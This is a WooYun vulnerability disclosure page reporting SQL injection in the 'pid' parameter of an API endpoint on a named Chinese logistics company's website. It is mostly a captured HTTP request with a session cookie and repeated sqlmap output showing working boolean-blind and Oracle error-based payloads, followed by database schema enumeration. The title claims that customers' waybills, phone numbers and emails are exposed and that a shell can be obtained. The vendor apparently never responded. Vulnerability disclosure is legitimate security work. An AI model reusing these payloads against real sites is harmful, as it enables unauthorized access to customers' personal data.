盛辉物流主站某处sql注入泄露所有运单信息以及注册用户手机号邮箱，另可getshell

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0193076

漏洞标题：盛辉物流主站某处sql注入泄露所有运单信息以及注册用户手机号邮箱，另可getshell

漏洞作者： Adoubi

提交时间：2016-04-06 21:05

修复时间：2016-05-21 21:10

公开时间：2016-05-21 21:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-04-06：积极联系厂商并且等待厂商认领中，细节不对外公开
2016-05-21：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

盛辉物流主站某处sql注入，泄露所有运单信息，以及用户资料

详细说明：

http://www.shenghui56.com/
注入产生在此处

POST /api/getcity HTTP/1.1
Host: www.shenghui56.com
Content-Length: 10
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://www.shenghui56.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.shenghui56.com/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=F78D3014F8BDECE128318FDC1E83A1CE; Hm_lvt_82116c626a8d504a5c0675073362ef6f=1459869997; Hm_lpvt_82116c626a8d504a5c0675073362ef6f=1459869997
pid=350000

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: pid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pid=350000' AND 6309=6309 AND 'bqAV'='bqAV
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: pid=350000' AND 4929=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(109)||CHR(100)||CHR(117)||CHR(58)||(SELECT (CASE WHEN (4929=4929) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(107)||CHR(99)||CHR(107)||CHR(58)||CHR(62))) FROM DUAL) AND 'jjPk'='jjPk
---
[12:49:34] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[12:49:34] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[12:49:34] [INFO] fetching database (schema) names
[12:49:34] [INFO] the SQL query used returns 24 entries
available databases [24]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] HD
[*] MDSYS
[*] MWLAPP
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SHAC
[*] SHEFFE
[*] SHITEM
[*] SHWLAPP
[*] SMS_XTTX
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB

漏洞证明：

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: pid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pid=350000' AND 6309=6309 AND 'bqAV'='bqAV
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: pid=350000' AND 4929=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(109)||CHR(100)||CHR(117)||CHR(58)||(SELECT (CASE WHEN (4929=4929) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(107)||CHR(99)||CHR(107)||CHR(58)||CHR(62))) FROM DUAL) AND 'jjPk'='jjPk
---
[12:49:34] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[12:49:34] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[12:49:34] [INFO] fetching database (schema) names
[12:49:34] [INFO] the SQL query used returns 24 entries
available databases [24]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] HD
[*] MDSYS
[*] MWLAPP
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SHAC
[*] SHEFFE
[*] SHITEM
[*] SHWLAPP
[*] SMS_XTTX
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: pid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pid=350000' AND 6309=6309 AND 'bqAV'='bqAV
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: pid=350000' AND 4929=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(109)||CHR(100)||CHR(117)||CHR(58)||(SELECT (CASE WHEN (4929=4929) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(107)||CHR(99)||CHR(107)||CHR(58)||CHR(62))) FROM DUAL) AND 'jjPk'='jjPk
---
[12:51:16] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[12:51:16] [INFO] fetching current database
[12:51:16] [INFO] resumed: SHWLAPP
current schema (equivalent to database on Oracle):    'SHWLAPP'

只是跑跑了数据个数，不干脱裤那种事。。。

修复方案：

过滤啊大哥。。地址也是可控的

版权声明：转载请注明来源 Adoubi@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：15 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0193076

漏洞标题：盛辉物流主站某处sql注入泄露所有运单信息以及注册用户手机号邮箱，另可getshell

相关厂商：盛辉物流

漏洞作者： Adoubi

提交时间：2016-04-06 21:05

修复时间：2016-05-21 21:10

公开时间：2016-05-21 21:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Adoubi@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0193076

漏洞标题：盛辉物流主站某处sql注入泄露所有运单信息以及注册用户手机号邮箱，另可getshell

相关厂商：盛辉物流

漏洞作者： Adoubi

提交时间：2016-04-06 21:05

修复时间：2016-05-21 21:10

公开时间：2016-05-21 21:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0193076"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Adoubi@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：